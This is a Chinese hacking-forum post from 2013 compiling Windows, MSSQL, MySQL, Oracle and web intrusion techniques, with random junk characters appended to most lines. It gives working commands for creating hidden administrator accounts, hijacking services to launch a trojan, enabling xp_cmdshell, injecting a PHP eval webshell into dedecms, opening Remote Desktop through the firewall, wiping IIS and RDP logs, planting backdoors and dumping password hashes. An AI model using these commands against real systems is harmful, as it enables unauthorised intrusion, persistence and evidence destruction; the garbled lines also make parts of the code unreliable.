找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 5327|回复: 0
打印 上一主题 下一主题

渗透技术大全

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-27 21:24:42 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
5 e! i+ C8 [8 b! l  ?1 e- E# `
1.net user administrator /passwordreq:no7 c- Q' [6 n9 r7 D. x' y0 u
这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了7 o/ U" u6 R6 V: L
2.比较巧妙的建克隆号的步骤
" I! |4 C) x; o0 I! s! ?先建一个user的用户
( ]' k# C, x4 ~7 v0 |, x- Q然后导出注册表。然后在计算机管理里删掉
9 K/ x: Z$ v  c3 u* m: d& x在导入,在添加为管理员组
6 r0 R, ^5 o! e7 |3.查radmin密码
( }/ F1 |; X/ p/ Q% J: e$ k, ~reg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg" p$ Q) m. H$ p) e9 M' `
4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]  L5 C* `+ F' k
建立一个"services.exe"的项
- x) l0 m5 C6 w再在其下面建立(字符串值)3 b0 [- ^4 ~- p" b: l0 C& R
键值为mu ma的全路径
; E# M( N; n. B5 i5.runas /user:guest cmd5 n7 x* ]$ q( j1 m: J6 q
测试用户权限!
; x# e0 o) f! V% ?/ `0 D# s# d, ^/ W6.、 tlntadmn config sec = -ntlm    exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'--   其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?
) q5 v  |0 J) U0 C5 ]# E7.入侵后漏洞修补、痕迹清理,后门置放:
% k" C% M7 g( I$ a% G  p+ ~4 l) q. `基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门
1 x5 c  z7 u3 Y8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c
" V: [& K% X, w+ u% F
  o, Y1 G* K0 e% x$ q7 n; e. Ffor example, f" |7 _) n3 f8 w6 b( U
$ P, m- j5 u2 O, q
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'. Z# z- t5 R, }4 k& T
/ _+ h2 _! ~) |8 S
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'
9 }! z$ |( M5 a# K9 u2 V, O6 `& X: T
9:MSSQL SERVER 2005默认把xpcmdshell 给ON了
: y/ ?( i- @4 t: y) W如果要启用的话就必须把他加到高级用户模式
( G4 i" B. r3 Z7 A6 N! A2 V2 P) g可以直接在注入点那里直接注入
2 H7 d6 x9 @! W5 N: ?2 x, Yid=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
6 z+ ?: Z: ]8 w; \% T: w; U# E4 ?然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--
5 F7 ^! A; y/ R1 d- |/ [# P或者" p9 ~& \1 ?: S5 _: J2 H
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
( N7 F2 L% v1 E$ A; \* I来恢复cmdshell。
9 d% @& E2 M  k( V7 K" Z, |$ k- S: \9 i* R
分析器
" J  {+ u* [0 p% F" @4 s/ n. z8 r( KEXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--# K1 G9 G; f( v$ x* S0 Z
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")* o* p9 z/ U. s9 Y: a$ V5 s/ n
10.xp_cmdshell新的恢复办法. g6 O7 D* Q5 c8 Q6 U1 {4 M
xp_cmdshell新的恢复办法
; L' H% O% n( s扩展储存过程被删除以后可以有很简单的办法恢复:% z# }+ ?5 R) a
删除7 h; H( U* \8 q$ r
drop procedure sp_addextendedproc
7 U+ Y- n5 v/ }) ]drop procedure sp_oacreate
8 h1 Z) g! @& L; v5 y" g; nexec sp_dropextendedproc 'xp_cmdshell'
% U+ r+ E6 Y4 _0 O4 `4 e" j* n; r3 W8 c5 y  C
恢复
2 `4 |' J2 ~) i5 i; M, y, n: Wdbcc addextendedproc ("sp_oacreate","odsole70.dll")# _2 |* m9 P3 o, t; |9 v( p
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")5 k% Z) k8 i6 `# O8 N; C$ l
& ?. b, U$ u  U& O' v- U) n) Q. h5 \9 l
这样可以直接恢复,不用去管sp_addextendedproc是不是存在
4 k- Y( m& l4 Y: ~9 B) G' C! T& M2 r
-----------------------------
( F1 Q+ E, x* Y$ l" q" E' W( L- a4 c
删除扩展存储过过程xp_cmdshell的语句:
" a( ?, |5 A/ t! ?exec sp_dropextendedproc 'xp_cmdshell'- }, V% C$ h2 g5 W
+ y, b3 c. g" o( P$ ]' T- w8 m
恢复cmdshell的sql语句
# |5 g* U% i" y; ]exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'% p' f  B( R% f! [+ D7 B6 X
& \* G- u3 O: @. Y3 r. }8 W& E' A
3 U) V6 ^) B' U# n
开启cmdshell的sql语句
; [" @& g5 z/ s& S5 `" K
# C# j! F+ s' @3 S. A# ]exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
; O) i- a7 ?9 [- Z) d* u6 P. Q* Z! ?+ s
判断存储扩展是否存在
2 F# v. u- s" L; `, u/ ?* M5 Sselect count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
7 |; n, t+ g1 f* T返回结果为1就ok# }4 e3 l% m. N5 {# W2 S

5 D0 g7 r0 Z& l1 Q恢复xp_cmdshell1 {6 |" D. h' }& F5 K7 W
exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
: ]: c, J' M  ?. G3 I返回结果为1就ok2 P  c$ ]9 J5 b: ~( `

( p6 d- C! s  R$ ?/ m否则上传xplog7.0.dll+ u: N; D$ ^2 ]1 |" H7 T) z$ d
exec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'2 B, J0 v5 A& F1 T: ~

* k4 v/ @8 D3 ^. R堵上cmdshell的sql语句
& L5 [$ I" j" n4 isp_dropextendedproc "xp_cmdshel9 J1 J, X! u- {, O" T# {$ E
-------------------------
. B  M/ j/ \$ V! u5 M清除3389的登录记录用一条系统自带的命令:
' L4 v. X3 n8 B5 h9 U" v6 Creg delete "hkcu\Software\Microsoft\Terminal Server Client"  /f
4 O" D& _9 A2 o! K
7 v7 F* O2 y' Y3 O然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件& Z' S" e/ \- A* q' h7 h' D* Y( [3 R
在 mysql里查看当前用户的权限& Q3 r5 l9 x1 r. g
show grants for  - c5 j( q1 H" n6 U) O

9 T/ Z. B! j7 q以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。
& v) d& j. T+ o' C* a3 e& ^1 \5 t: W  p& i' Z: }2 r+ q) g* C' `( V2 l

% S% V4 A& I2 I6 i" JCreate USER 'itpro'@'%' IDENTIFIED BY '123';% H, R" h' t; Q7 e$ b3 n
# I/ ^0 y( Z4 K6 }/ \# x
GRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION
6 @0 W, O4 _. Y8 c+ H0 ]
' F" w& |& ^  {1 _( c; ~; WMAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0# d5 z# ?' p4 A5 N, K

  {& \5 [- i! @MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;9 y  Z& C$ g+ F' a

. l3 W0 d+ |( u* e% \4 d搞完事记得删除脚印哟。: [9 x$ L9 o) P; ?! U* ?: Q. l

8 h5 v* o: ?, ?& u, l" \Drop USER 'itpro'@'%';% P$ ?# x0 r) O3 G/ m# ?5 a. k" u
( v9 Y" \" V. H( e
Drop DATABASE IF EXISTS `itpro` ;; d4 e" Z4 c$ H# ?& Q% W
1 t3 e' ]4 P# R! F
当前用户获取system权限7 M; j! @) k: @# d& R! Y; [  x
sc Create SuperCMD binPath= "cmd /K start" type= own type= interact
; |7 f5 z8 b$ Z7 ssc start SuperCMD8 Z, z  |: i5 `$ x
程序代码
$ F) h% W& p( o2 j! T/ r<SCRIPT LANGUAGE="VBScript">
' f1 y' Z  ?( Q! g. s1 gset wsnetwork=CreateObject("WSCRIPT.NETWORK")
. p. }( X+ M/ _, O( v. zos="WinNT://"&wsnetwork.ComputerName
$ `, ^- c; }% |' v6 F* JSet ob=GetObject(os)! P9 d: a% G. t1 x: c( K0 d
Set oe=GetObject(os&"/Administrators,group")9 L( z7 z+ }$ X3 N! j, L
Set od=ob.Create("user","nosec")- t# {4 v8 Y( L+ s7 ~
od.SetPassword "123456abc!@#"8 G7 t4 P3 v, B& ]
od.SetInfo0 b: e" F5 q8 t' \
Set of=GetObject(os&"/nosec",user)
2 I- k0 Z% B1 R# {9 y6 o- y  A. boe.add os&"/nosec"
1 X. {1 ?. M4 n2 e% g</Script>
6 o& s/ x. i* e* t; \& y8 n$ n# P<script language=javascript>window.close();</script>
; P. d: u! i5 m( I* j* r- M. k( d9 t& u4 q# L' C, M# c

! |+ G& v) C1 }# d- J! G$ X7 k
. X7 r+ L3 w5 S$ S1 W& M
& P2 F; _7 w6 y( }7 [突破验证码限制入后台拿shell
) q0 ^3 M* b3 x! W- p2 Z: U程序代码
6 G( w$ U/ D+ b. BREGEDIT4
8 f0 Q, e( B0 v8 F' W[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security] $ D! `2 {  O& D; B# x& z+ F/ h
"BlockXBM"=dword:00000000
& C. u1 }8 P0 F) _: ~8 Z/ S" q
( W0 v3 p& z) @8 |保存为code.reg,导入注册表,重器IE
- Y8 ^2 ?: J- I3 f/ j3 ~8 }就可以了
; b0 a& X8 A; b$ d& \3 munion写马
" W6 K% ~+ w4 G3 J- M程序代码/ ^7 ]3 R- c4 F5 i9 y+ c
www.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*5 Y' z" `; V; X9 L* L3 O
! P) Q% J1 U) Y9 E4 n1 q5 I$ Q: }
应用在dedecms注射漏洞上,无后台写马
8 y4 _' }1 |# q. idedecms后台,无文件管理器,没有outfile权限的时候
+ _) _1 i8 f2 y  q9 E: ^- ~" e在插件管理-病毒扫描里
" {6 ~: J+ N- O% c/ G写一句话进include/config_hand.php里  u9 x6 m9 o% G# e; F
程序代码1 z. N! e# V3 Z- \! l+ K; V8 F% H
>';?><?php @eval($_POST[cmd]);?>. F5 g4 |2 J4 I$ p
( B8 W$ p7 T( j% [2 G$ r
% l  v& R. Z/ N% L$ ~  d  L: l$ }+ V
如上格式
$ D9 p0 {7 A6 A! q$ F/ h
9 m. e5 k1 ]# I5 ^# D+ n9 F; boracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解
, ]- b0 N( y. Z程序代码
, T# p; t4 G9 R6 Z# H0 z! R4 {  M& rselect username,password from dba_users;
8 N+ d6 H4 @4 a
6 ^- ^  H7 h2 |( B5 c( _0 V/ g
+ {5 z# z# F: tmysql远程连接用户  z9 Q6 b7 c% f
程序代码: o- J  x3 }5 l) \6 F8 T% ^
. C0 h: O( e  z9 }6 S+ P* `
Create USER 'nosec'@'%' IDENTIFIED BY 'fuckme';
3 g' }) n- P% D- pGRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION) o& Z. L1 a' w# F% u6 v
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
' n  o. m# m% W+ x2 N2 zMAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
5 _. X  u; ]0 A* M
( r" f, y# Y$ u- D) D2 i, M; X
# O$ V/ [8 ^7 y# j( l. e1 R, h- y$ B' F* i: ?
1 U& t/ b: o6 |$ _& X
echo y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
1 j- q1 b% q& o- o
$ A1 g6 D4 Y4 M2 k0 g: H$ n1.查询终端端口) i6 d8 N1 j% @% ]) P( u
4 N9 }& {1 u; _1 i. M$ g7 s+ Z( N
xp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
! z, i1 D" t; s4 i( X8 U: j8 I+ ]
! K$ R5 q. v0 c7 p通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp") e. I6 G3 a3 b% C! ]% w/ i
type tsp.reg
1 H9 m2 D0 k; i5 }* `. J' X9 i: ?/ \5 f! g8 o$ B
2.开启XP&2003终端服务
0 x, h, S! A6 i6 e# f: w  U# ]
/ Z$ R: E% M- L9 _# ?) m( N4 _' p
. T: d/ g% Z  bREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f/ d  F8 N4 V9 i. V# o
, R" T, |9 w+ U; ~9 v& O

9 ]7 S0 S$ x4 ~0 K7 U1 T0 _' t( GREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
5 Q. _: F5 r, T' }9 t+ B6 n. |: }$ n- ^' O0 U$ Q; h( I
3.更改终端端口为20008(0x4E28)
9 I: A/ ?: r( t0 x/ h
5 Q/ Q, A8 D3 |REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
5 _3 h0 O1 z9 t
" S* N! \3 l9 F( F; I8 n4 p+ E# aREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f1 _7 h9 ~9 }( ~8 I# s. F. s
. k! n; f! ~: v; A( n
4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制
7 z6 R% ], W) i! d5 E8 d# v' i# e" s: L3 h. w
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f
. @# X! D3 o6 B5 h, L2 {! B% h8 F, g( Y
% @, N# `  ]3 l$ d+ w+ n
5.开启Win2000的终端,端口为3389(需重启), E# j; b* `" d3 L& m' O

; Y3 E0 |( }: c8 R% B9 c" ^( Hecho Windows Registry Editor Version 5.00 >2000.reg 1 c6 L) T" z0 R2 _3 ]* Z- {8 }& ~
echo. >>2000.reg
0 O5 V& l- Z; }3 E3 @. d: i% j& hecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg
4 v$ J6 q- R: a% J8 z' V. c$ {, }echo "Enabled"="0" >>2000.reg ( E* C- X: x' a
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg / o6 C( O  \0 S4 Z5 D" }' M: |
echo "ShutdownWithoutLogon"="0" >>2000.reg * p3 a" w+ N+ _5 E% U
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg - {7 O) _' Z6 H$ P! I7 Y3 V
echo "EnableAdminTSRemote"=dword:00000001 >>2000.reg
6 G5 \3 {/ b( ~2 j# ]echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg
% A. [1 T' r" @9 `" G( Secho "TSEnabled"=dword:00000001 >>2000.reg   d+ f5 N1 V) D8 J
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg
/ N# |' W6 X/ w  C) N7 e% Fecho "Start"=dword:00000002 >>2000.reg / D% T( E0 N  `1 N6 t. ]2 v$ o& k
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg 6 p% s  Z+ Z8 z4 W
echo "Start"=dword:00000002 >>2000.reg - W4 @: [" b  q! G' o
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg
) s; W/ h$ J; j1 z4 D( L$ Aecho "Hotkey"="1" >>2000.reg   X4 H* }# l/ q" h3 V
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg
- H7 g( S) ]/ b' s4 M1 D+ vecho "ortNumber"=dword:00000D3D >>2000.reg
+ d2 n: _3 T% R  V, ?: D) z) iecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg
& `/ H; f9 l9 Zecho "ortNumber"=dword:00000D3D >>2000.reg( x" s2 w% {1 G! _
5 i" g/ J3 E6 a4 J$ Q* h
6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启): C. u3 Q$ X: U- P, L! ^2 l$ s* o4 Q

; D5 b" K( v' S, G# X/ a7 T& `9 n@ECHO OFF & cd/d %temp% & echo [version] > restart.inf8 w. a5 e3 C0 V* s$ L
(set inf=InstallHinfSection DefaultInstall)% v  r8 D, L$ B: T& Z3 F" n( g0 {. S
echo signature=$chicago$ >> restart.inf7 Y' n  R  W4 H7 A  n
echo [defaultinstall] >> restart.inf
$ f. a* O# B" Erundll32 setupapi,%inf% 1 %temp%\restart.inf% I8 ~% i* F% R) h4 z& i- ]
7 }8 S4 P0 B9 w5 C
" T, m( a! a7 `6 c
7.禁用TCP/IP端口筛选 (需重启); V8 C# D# ^( l/ D
4 K) O0 z. |: i( I* o
REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f
! n% X# v4 r- o0 y& K7 o9 j4 U
- _6 a) Y1 P) [, p9 Z8.终端超出最大连接数时可用下面的命令来连接7 y, \- y  s  ]0 W! N1 |5 C! Z

5 q  E% N( Y$ R5 imstsc /v:ip:3389 /console6 \+ A- h/ M" o" W8 u3 X

( ]2 ~4 |5 S1 e6 o9 ~6 Z9.调整NTFS分区权限1 f4 |" ^& Y4 `

) Z0 n, p0 |4 R6 M% Ecacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)# T- S6 \; ]% s7 v, ~
( U' t5 ]8 [+ o7 @0 G8 a4 N
cacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)
9 H1 y8 {  d5 `3 Q
$ z. L6 j) U' B, W: M------------------------------------------------------) D- q6 X; ]7 ^3 l
3389.vbs
2 M- ?2 M6 `$ m  c  h. uOn Error Resume Next
. u" \$ s  H" Bconst HKEY_LOCAL_MACHINE = &H800000022 s- F  w2 T2 f) }6 O
strComputer = "."/ w. S$ f" k/ \# M
Set StdOut = WScript.StdOut: d) l+ U5 U# S& j! s7 J2 J* J5 H
Set oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
& g; h5 x! l. I5 t3 d( pstrComputer & "\root\default:StdRegProv")2 i% P& T% g# Q+ m
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"* p8 ~. w. H2 K
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
7 s: o' V) ~# M' D' c3 QstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"/ y  l! I* V* ?' b
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath7 Z/ D- F( O+ g5 P2 f
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
: s8 g# a6 m5 c, L7 p. [strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
7 d- Q! j3 Q3 i3 m) f1 ?strValueName = "fDenyTSConnections"3 x9 {# Y4 e( |; u  f# m6 a
dwValue = 06 b/ e& y5 n( i- M/ _/ E5 a
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
* r1 n- m3 S6 ]' y' istrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"6 `, n! i. [% J& V/ l
strValueName = "ortNumber"$ g% V* W) `. F' b! ]
dwValue = 3389
% C# B5 _* }6 q& ]: P3 [0 Eoreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
2 x* r: u2 h2 `1 [3 i6 gstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
/ o1 `8 Y5 Q0 d7 ~strValueName = "ortNumber"
& I. z+ H& n1 n. {$ F  W7 udwValue = 3389
( `6 ]" }( L" e- horeg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue/ D, Y- S- y( A/ m
Set R = CreateObject("WScript.Shell") # ~4 ]" \+ ?" L. E
R.run("Shutdown.exe -f -r -t 0")
% ?; ?% y; i) {8 D' ]% l7 r
8 y& S1 _% ^+ J, N) e删除awgina.dll的注册表键值; B& n9 |' X9 N
程序代码. ~! c) I/ a; _1 W

" i) S1 g6 p) h8 @8 E" g  J- F3 freg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f
6 v* |  T9 l2 r* W) Q$ f. F( `8 k8 a+ \9 `
" [$ K/ R2 ?5 _/ D6 z

1 S! V' T" y( [' o* ~( j- V/ l6 N
1 l' o# m9 o3 |程序代码# N3 V8 Q% A& ^( F: {0 n$ }
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash. C0 L* F5 E9 a7 }$ G* U, J
9 L8 M8 M5 J' m
设置为1,关闭LM Hash7 I7 t. D% Y3 V2 H  F! N  g9 I

& U4 w7 g9 i& \9 D# S4 r* ?7 s% L数据库安全:入侵Oracle数据库常用操作命令  l) \/ u2 W+ L! b! Z3 c; _
最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。4 e) T9 ?5 B0 A2 ^) H5 d! P7 U, e
1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。) p$ v. E: D' q( s8 n: \1 T: C
2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;
+ g2 `. a" |  U5 o9 p) u3 k3、SQL>connect / as sysdba ;(as sysoper)或. k5 i! K1 [$ x  f* D
connect internal/oracle AS SYSDBA ;(scott/tiger)
7 H. n* l3 w5 C+ G/ n6 o) L9 tconn sys/change_on_install as sysdba;( I8 I9 Z5 @: ^
4、SQL>startup; 启动数据库实例& j6 ^  E% S6 r- D# ]& f% O) q
5、查看当前的所有数据库: select * from v$database;. k6 O( z! _0 Z- E3 l
select name from v$database;
6 a+ u6 m. W/ x5 G  P. G# D/ Y6、desc v$databases; 查看数据库结构字段
9 D! H. s2 B' s4 Y8 ~8 e% q' q9 [7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:
) H' s8 l( J1 `+ a4 QSQL>select * from V_$PWFILE_USERS;# r$ L$ Y3 w) s' U
Show user;查看当前数据库连接用户1 `2 W$ c* i# d
8、进入test数据库:database test;
3 @% F+ J! X( p% @6 Z7 p9、查看所有的数据库实例:select * from v$instance;
: F" ?, R# `4 a如:ora9i$ i1 J0 j6 x* ^
10、查看当前库的所有数据表:, N6 h* Y/ Y7 X* h
SQL> select TABLE_NAME from all_tables;
$ O/ _$ r4 S% k% x# {select * from all_tables;
# l& B, G2 n0 e9 g8 ?# n  q, N, w% ?SQL> select table_name from all_tables where table_name like '%u%';
5 w6 v8 u% E" V( w% p0 O9 g7 \TABLE_NAME5 `* [+ ?. m$ O4 e4 z- f7 I. p
------------------------------
' C) h% a" E1 H! M8 K) z_default_auditing_options_# T% M! m, V+ p+ ?
11、查看表结构:desc all_tables;9 [' p; G7 w9 w% {
12、显示CQI.T_BBS_XUSER的所有字段结构:
& ~- m) t  z! a% Qdesc CQI.T_BBS_XUSER;
8 l% D8 g1 V' n2 `  C: u3 L, Z13、获得CQI.T_BBS_XUSER表中的记录:7 P- X; X! \, ]& |& x1 ?
select * from CQI.T_BBS_XUSER;
% c# f) P0 [% n8 R% [) p2 W$ |) C14、增加数据库用户:(test11/test)
$ N% S/ M* I" v$ G$ ^& Qcreate user test11 identified by test default tablespace users Temporary TABLESPACE Temp;7 t  X  \" X5 d) L( P% A) }4 ~
15、用户授权:
3 A8 N4 h2 O# z% u; K8 ogrant connect,resource,dba to test11;
, X6 N) b( H( t6 q! `grant sysdba to test11;) _; q3 k, M0 x' {
commit;# e5 e5 ]5 w0 g
16、更改数据库用户的密码:(将sys与system的密码改为test.)
! U+ ?8 a# m' N' @( calter user sys indentified by test;" Q- }' l; j( G
alter user system indentified by test;# D. j/ k% a& o) n/ D# J* C, }. T
; @  k( u" e) s' \8 ?, [+ v
applicationContext-util.xml
% S1 k/ [1 l3 B3 o0 K' o1 H/ NapplicationContext.xml8 R) i) n& ]5 W" I: G% `3 |  n) V7 l
struts-config.xml' |5 V3 k: ?* J: s
web.xml6 g/ Q, r" ~4 C  w
server.xml# `- u" G7 ^5 o: a/ |5 @$ i. P
tomcat-users.xml
: G; m3 j  h8 ?& F5 z# ghibernate.cfg.xml
' @2 R& Z+ _  W( c+ @database_pool_config.xml/ a* _' ?" R; e: F* m* z

" y7 @% C8 q9 \; L9 o8 V# K- E2 F# ]5 {0 d  M% Z" h0 l1 ^
\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置! q# L: J+ H9 B1 J" f0 J
\WEB-INF\server.xml         类似http.conf+mysql.ini+php.ini
" i- N/ }. O2 q\WEB-INF\struts-config.xml  文件目录结构
- |6 B( @: U6 @1 B2 @) h+ f# R% U8 w0 o# k7 n5 M
spring.properties 里边包含hibernate.cfg.xml的名称
" x2 k, F1 A5 I5 g
; J' n( ]' v$ }0 h" ]/ @- j% K) o$ ?, R2 L+ X
C:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml6 B0 ]0 |1 E- Z* p. _# X0 Z

+ ]  L# R( @2 |6 G/ {: X* F如果都找不到  那就看看class文件吧。。
. R3 K9 M, @1 z+ H3 b0 h/ C1 P7 o  q4 p
测试1:9 b2 `6 P; X8 e; m6 ]
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t  where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1. r% r4 B5 B: [1 m8 s
- m1 `& \7 e. O# w4 l! M# \
测试2:" {4 n( s: h$ t6 F# d- r8 g
8 A( y9 q6 {% U" e+ ]9 W
create table dirs(paths varchar(100),paths1 varchar(100), id int)
  A- e3 C+ d( r$ [1 O1 K4 N9 w) C% k, r9 T2 D& n
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--  a, r0 c2 S" d( t( o/ t3 j# `( y
- Y0 B- c& }! E
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
5 ~6 I5 I. U5 M* T; L- A+ y1 s0 i+ @  m6 o# T
查看虚拟机中的共享文件:. a9 H1 ], ?: i% `5 f
在虚拟机中的cmd中执行
/ ~; M! I# U8 h' s" Y* l( b1 u& q- a\\.host\Shared Folders
* {: [- C( v+ ?! ^# R* f7 y' O- m1 a1 g
cmdshell下找终端的技巧
! K2 G7 ?5 X& X  [" U9 G; ?2 P5 F找终端: / b6 C: w! U0 {; K. n1 {8 u( M
第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值!
$ a# P6 ?; B2 Z0 T% e   而终端所对应的服务名为:TermService
  D! q9 V! O# \4 M第二步:用netstat -ano命令,列出所有端口对应的PID值!
+ Q# }* M9 p. H+ i( }4 l   找到PID值所对应的端口6 R7 E+ |/ }3 e' ^3 k! w
1 E' V9 n4 d; M; ]9 P# ~
